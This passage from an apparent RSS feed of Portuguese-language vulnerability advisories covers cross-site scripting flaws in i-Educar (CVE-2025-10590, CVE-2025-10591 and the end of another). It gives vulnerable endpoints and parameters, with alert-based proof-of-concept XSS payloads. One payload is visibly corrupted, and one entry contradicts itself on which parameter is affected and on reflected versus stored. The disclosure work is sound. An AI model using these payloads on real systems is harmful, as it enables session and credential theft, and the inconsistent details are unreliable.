		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;269&amp;#34;
		data-flex-basis=&amp;#34;645px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-10584/image-1.png&amp;#34;
	width=&amp;#34;513&amp;#34;
	height=&amp;#34;192&amp;#34;
	srcset=&amp;#34;/p/cve-2025-10584/image-1_hu_9c4497507da3b07c.png 480w, /p/cve-2025-10584/image-1_hu_4de765f0b51183da.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;267&amp;#34;
		data-flex-basis=&amp;#34;641px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-10584.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-10584.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/karina50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Karina Gante&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Wed, 17 Sep 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-10590</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-10590/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-10590/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-10590-cross-site-scripting-xss-refletido-no-endpoint-educar_usuario_detphp-parâmetro-ref_pessoa&amp;#34;&amp;gt;CVE-2025-10590: Cross-Site Scripting (XSS) Refletido no endpoint &amp;lt;code&amp;gt;educar_usuario_det.php&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;ref_pessoa&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-10590&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-10590&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Refletido) foi identificada no endpoint &amp;lt;code&amp;gt;educar_usuario_det.php&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;ref_pessoa&amp;lt;/code&amp;gt;.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;educar_usuario_det.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;ref_pessoa&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro &amp;lt;code&amp;gt;q&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-10590-cross-site-scripting-xss-refletido-no-endpoint-educar_usuario_detphp-parâmetro-ref_pessoa&amp;#34;&amp;gt;CVE-2025-10590: Cross-Site Scripting (XSS) Refletido no endpoint &amp;lt;code&amp;gt;educar_usuario_det.php&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;ref_pessoa&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-10590&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-10590&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Refletido) foi identificada no endpoint &amp;lt;code&amp;gt;educar_usuario_det.php&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;ref_pessoa&amp;lt;/code&amp;gt;.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;educar_usuario_det.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;ref_pessoa&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro &amp;lt;code&amp;gt;q&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;amp;#39;;alert(String.fromCharCode(88,83,83))//&amp;amp;#39;;alert(String.fromCharCode(88,83,83))//&amp;amp;#34;;alert(String.fromCharCode(88,No known CVE&amp;amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;SCRIPT&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;amp;#34;&amp;amp;gt;&amp;amp;#39;&amp;amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;SCRIPT&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nb&amp;#34;&amp;gt;String&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;fromCharCode&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;88&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;,&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;83&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;,&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;83&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;))&amp;amp;lt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;SCRIPT&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-10590/image.png&amp;#34;
	width=&amp;#34;1021&amp;#34;
	height=&amp;#34;565&amp;#34;
	srcset=&amp;#34;/p/cve-2025-10590/image_hu_f7f8725a4c3c24c2.png 480w, /p/cve-2025-10590/image_hu_2dd04bd1070639af.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;180&amp;#34;
		data-flex-basis=&amp;#34;433px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10590.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10590.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Wed, 17 Sep 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-10591</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-10591/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-10591/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-10591-múltiplos-cross-site-scripting-xss-armazenado-no-endpoint-educar_funcao_cadphp&amp;#34;&amp;gt;CVE-2025-10591: Múltiplos Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;educar_funcao_cad.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-10591&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-10591&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Múltiplas vulnerabilidades de XSS (Cross-Site Scripting Armazenado) foram identificadas no endpoint &amp;lt;code&amp;gt;educar_funcao_cad.php&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros &amp;lt;code&amp;gt;abreviatura&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;tipoacao&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;/intranet/educar_funcao_cad.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-10591-múltiplos-cross-site-scripting-xss-armazenado-no-endpoint-educar_funcao_cadphp&amp;#34;&amp;gt;CVE-2025-10591: Múltiplos Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;educar_funcao_cad.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-10591&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-10591&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Múltiplas vulnerabilidades de XSS (Cross-Site Scripting Armazenado) foram identificadas no endpoint &amp;lt;code&amp;gt;educar_funcao_cad.php&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros &amp;lt;code&amp;gt;abreviatura&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;tipoacao&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;/intranet/educar_funcao_cad.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetros: &amp;lt;code&amp;gt;abreviatura&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;tipoacao&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário nos parâmetros &amp;lt;code&amp;gt;abreviatura&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;tipoacao&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload-1&amp;#34;&amp;gt;Payload 1:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;amp;#34;&amp;amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;svg&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;onload&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;alert(15888888)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h3 id=&amp;#34;payload-2&amp;#34;&amp;gt;Payload 2:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;amp;#34;&amp;amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;XSS-PoC&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;amp;lt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-10591/image.png&amp;#34;
	width=&amp;#34;1193&amp;#34;
	height=&amp;#34;615&amp;#34;
	srcset=&amp;#34;/p/cve-2025-10591/image_hu_9dfb1cc0643b24b3.png 480w, /p/cve-2025-10591/image_hu_a0e3d84ac9dcf37.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;193&amp;#34;
		data-flex-basis=&amp;#34;465px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-10591/image-1.png&amp;#34;
	width=&amp;#34;1228&amp;#34;
	height=&amp;#34;568&amp;#34;
	srcset=&amp;#34;/p/cve-2025-10591/image-1_hu_1c1df20dcb8f0e5d.png 480w, /p/cve-2025-10591/image-1_hu_10a5213779d6b9a0.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;216&amp;#34;
		data-flex-basis=&amp;#34;518px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
